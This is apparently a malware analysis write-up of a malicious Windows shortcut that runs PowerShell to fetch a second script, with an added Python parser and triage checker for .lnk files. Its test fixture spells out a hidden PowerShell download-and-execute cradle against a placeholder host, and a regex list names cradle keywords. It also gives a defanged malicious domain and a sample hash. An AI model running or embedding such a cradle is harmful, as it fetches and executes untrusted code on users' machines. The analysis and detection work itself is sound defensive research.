I downloaded this malicious Microsoft shortcut sample from VirusTotal for analysis.
After downloading, I renamed it sample.lnk (.LNK is the Microsoft shortcut extension).
When I opened the file's Properties tab, I found the properties below, which clearly show that it is not a shortcut to any application but a PowerShell script that executes on opening.
- Target Type: Application
- Target: PowerShell script
- Description: Windows PowerShell
I copied the PowerShell script and pasted it into a text file.
Behaviour of the PowerShell script:
- Downloads another PowerShell script, out-763347625.ps1, from the URL https[:]//latinotca-ar[.]com
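The properties above (description, target, arguments) all live in the shortcut file's own header and StringData sections, so they can be read without double-clicking the file. The following is an added example, not code from this write-up: a small parser for the Shell Link format (MS-SHLLINK) that pulls out the ShowCommand and the StringData fields, plus a triage check that flags shortcuts whose target is a script host and whose arguments look like a download cradle. The two sample shortcuts are constructed in code (the URL is a placeholder, not the sample's real one); the ANSI code page is assumed to be cp1252 and LinkInfo/IDList are skipped rather than decoded.

```python
import hashlib
import re
import struct

# LinkFlags bits from the Shell Link header (MS-SHLLINK section 2.1.1).
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# CLSID 00021401-0000-0000-C000-000000000046 as stored on disk (little-endian GUID).
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
SW_SHOWMINNOACTIVE = 7  # ShowCommand value that starts the target minimised (often used to hide a console)

# StringData sections appear in this fixed order when their flag is set.
STRING_DATA = (
    (HAS_NAME, "description"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)


def parse_lnk(data: bytes) -> dict:
    """Return ShowCommand and the StringData fields of a .lnk without launching it."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link (.lnk) file")
    flags = struct.unpack_from("<I", data, 20)[0]
    fields = {"show_command": struct.unpack_from("<I", data, 60)[0]}
    off = 76
    if flags & HAS_LINK_TARGET_ID_LIST:  # skip IDList; IDListSize excludes its own 2-byte field
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:  # skip LinkInfo; LinkInfoSize includes its own field
        off += struct.unpack_from("<I", data, off)[0]
    unicode = bool(flags & IS_UNICODE)
    for flag, name in STRING_DATA:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, off)[0]  # CountCharacters, no terminator
        off += 2
        nbytes = count * 2 if unicode else count
        raw = data[off:off + nbytes]
        off += nbytes
        fields[name] = raw.decode("utf-16-le" if unicode else "cp1252")  # cp1252 assumed for ANSI
    return fields


SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
ARG_PATTERNS = [
    re.compile(p, re.IGNORECASE)
    for p in (r"https?://", r"downloadstring|downloadfile|invoke-webrequest|\biwr\b",
              r"\biex\b|invoke-expression", r"-e(nc(odedcommand)?)?\s",
              r"-w(indowstyle)?\s+hidden", r"-nop(rofile)?\b", r"bypass")
]


def triage_lnk(data: bytes) -> dict:
    """Static triage: script-host target, cradle-like arguments, hidden window hint."""
    info = parse_lnk(data)
    exe = info.get("relative_path", "").replace("/", "\\").rsplit("\\", 1)[-1].lower()
    args = info.get("arguments", "")
    reasons = []
    if exe in SCRIPT_HOSTS:
        reasons.append(f"target is the script host {exe}")
    hits = [p.pattern for p in ARG_PATTERNS if p.search(args)]
    if hits:
        reasons.append("arguments match " + ", ".join(hits))
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        reasons.append("ShowCommand minimises the launched window")
    return {"sha256": hashlib.sha256(data).hexdigest(), "fields": info,
            "suspicious": bool(reasons), "reasons": reasons}


def build_lnk(description, relative_path, arguments, working_dir=None, show_command=1) -> bytes:
    """Assemble a minimal Unicode .lnk (constructed test data, not a real sample)."""
    flags = HAS_LINK_TARGET_ID_LIST | HAS_NAME | HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    if working_dir is not None:
        flags |= HAS_WORKING_DIR
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    # One dummy ItemID (size 4) followed by the 2-byte TerminalID; IDListSize = 6.
    id_list = struct.pack("<HH", 6, 4) + b"\x1f\x00" + b"\x00\x00"

    def s(text):
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    body = s(description) + s(relative_path)
    if working_dir is not None:
        body += s(working_dir)
    return header + id_list + body + s(arguments)


# Constructed sample mirroring the properties described above (placeholder URL, not the real one).
SUSPICIOUS_LNK = build_lnk(
    description="Windows PowerShell",
    relative_path=r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    arguments='-WindowStyle Hidden -NoProfile -Command "IEX (New-Object Net.WebClient)'
              ".DownloadString('https://placeholder.invalid/out-0000.ps1')\"",
    show_command=SW_SHOWMINNOACTIVE,
)
BENIGN_LNK = build_lnk("Notes", r"..\..\Windows\notepad.exe", r"C:\Users\Public\notes.txt")

if __name__ == "__main__":
    for label, blob in (("suspicious", SUSPICIOUS_LNK), ("benign", BENIGN_LNK)):
        result = triage_lnk(blob)
        print(label, result["sha256"][:16], result["suspicious"], result["reasons"])
```

To apply it to a real file, pass `open("sample.lnk", "rb").read()` to `triage_lnk`; the SHA-256 it returns is the value to look up on VirusTotal, and the decoded `arguments` field is the script text that would otherwise only be visible in the Properties dialog.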
I double-clicked it to check the behaviour: a command prompt window opened and closed.
I could see the PowerShell script execute and try to connect to the URL; Wireshark captured the network traffic.
The web site has been taken down. I tried to open the URL in a browser, and it is inaccessible.
VirusTotal sample:
SHA-256: 5c5c2c6197d4b1c24c438b8fb0452257c9e4085ac59297a985ec92ef1720b74d